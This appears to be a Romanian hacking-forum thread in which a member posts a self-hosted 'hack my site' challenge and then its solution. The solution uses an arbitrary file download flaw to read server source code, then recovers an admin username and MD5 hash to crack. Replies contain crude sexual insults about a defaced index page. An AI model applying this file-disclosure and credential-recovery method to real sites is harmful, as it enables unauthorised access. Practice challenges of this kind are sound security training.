Jump to content
dancezar

Hack My Site[Challenge]

Recommended Posts

  • Active Members

Target:http://danyweb09.byethost7.com/

Dificultate:Usor poate mediu

Scopul:

Sa gasiti o vurnerabilitate in site care sa va permita sa accesati panoul de administrare si sa va postati numele pe pagina principala.

Reguli:-Nu dati hinturi este prea usor

-Pe pagina de index sa apara numele nickul vostru real pe care il folositi pe RST

-Daca nu ati postat nickul vostru real am sa postez la solvers exact ce nume este acolo

La sfarsit am sa postez si rezolvarea

+++Solvers+++

-shark0der

-Stone

-shaggi

-ionut97

-renegade

-roby4kill

-rey

Challenge closed

Felicitati tuturod desi uni nu au inteles care era scopul acestui chall

Rezolvare:

Partea vurnerabila era http://danyweb09.byethost7.com/download.php?file=doc1.doc aceasta vurnerabilitate se numeste Souce Code Discloure si permite atacatorului sa descarce orice fisier de pe server.

1)Incepem prin a descarca fisierul download.php

http://danyweb09.byethost7.com/download.php?file=download.php

2)Ne uitat in codul sursa si observam urmatoarea contitie

if($_GET['file']=="login.php"||$_GET['file']=="register.php"||$_GET['file']=="chall3.php"||$_GET['file']=="xss.php"||$_GET['file']=="suleiman/cf.php"||$_GET['file']=="index.php"||$_GET['file']=="./login.php"||$_GET['file']=="./register.php"||$_GET['file']=="./chall3.php"||$_GET['file']=="./xss.php"||$_GET['file']=="./suleiman/cf.php"||$_GET['file']=="./index.php")

Deci este ceva intezis in directorul suleiman

3)Cu ajutorul unui admin page finder cautam pagina de admin in directorul http://danyweb09.byethost7.com/suleiman/

Si gasim pagina de administrator la http://danyweb09.byethost7.com/suleiman/admin.php

4)Observam ca nu putem trece de acest login prin Sql injection.Ne folosim de acelasi SCD pentru a vedea ce este in pagina sursa a paginei de administrator.O descarca in felul urmator http://danyweb09.byethost7.com/download.php?file=./suleiman/admin.php

5)In codul sursa gasim urmatoarea conditie

if($_POST['user']=="danyweb09"&&md5($_POST['pass'])=="8ad550447551e33feeb60179a3e4e3a2")

Deci userul este danyweb09 si parola este criptata in md5 v-a trebui sa o decriptati cu orice soft doriti sau cautand hashu pe google.

Edited by danyweb09
Link to comment
Share on other sites

  • Active Members

Din cauza lui Sharkcode care se da mare smecher ca a gasit si el SCD si gata face faze pe indexul meu

initial:challenge 4(sa imi suga pula tristisor)

sharck s-a simtit

Dupa:challenge 4(sa imi suga pula tristisor)(then my friend ... you've got 99 problems and a bitch ain't on)

Dupa am modificat eu la loc

Apoi el

challenge 4(sa imi suga pula tristisor)(As vrea sa am pula mare)

Dupa am modificat eu

challenge 4(sa imi suga pula tristisor) Am pula mare

Dupa iar el

challenge 4(sa imi suga pula tristisor) Uneori imi imaginez ca am pula mare

Apoi eu

challenge 4(sa imi suga pula tristisor) Uneori imi imaginez ca am pula mica ...din pacat am pula asa de mare incat nu ma pot minti singur

Apoi el

challenge 4(sa imi suga pula tristisor) Uneori am pula mare ....Numai ca alti mi-a iau inainte

Apoi eu

challenge 4(sa imi suga pula tristisor) Uneori am pula mare ....Numai ca alti mi-a iau inainte...in gura

Dupa s-a suparat mi-a sters indexul si mi-a lasat mesaj

Hai sa fim rai?

Apoi eu

Hai sa imi sugi pula

Apoi am modificat cum este acum

Nu v-a dura mult pana rezolv problema ca datele de logare pe beythost nu poti sa ai o parola diferita la Control Panel si alta la baza de date.Am sa mut baza de date pe alt server sau vad eu cum fac.

//S-a rezolvat

Edited by danyweb09
Link to comment
Share on other sites

Nu te mai plange ca o femeie, SCD-ul nu era lasat cu intentia sa vada toti parola ta, daca intr-adevar ai fi vrut sa lasi SCD, trebuia sa o faci cu grija.

PWND again!

ZpCzIlB.png

Si ca sa stii si cum am intrat de la bun inceput si pe tot parcursul challenge-ului:

yI9CyvA.png

XuVfGUT.png

ScPeNaO.png

P.S. I feel your pain, bro:

HZxe889.png

P.P.S. Pentru ca am fost intrebat de mai multe ori ce tool am folosit, here it is:

https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

ZAP-ScreenShotSearchTab.png

Edited by shark0der
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...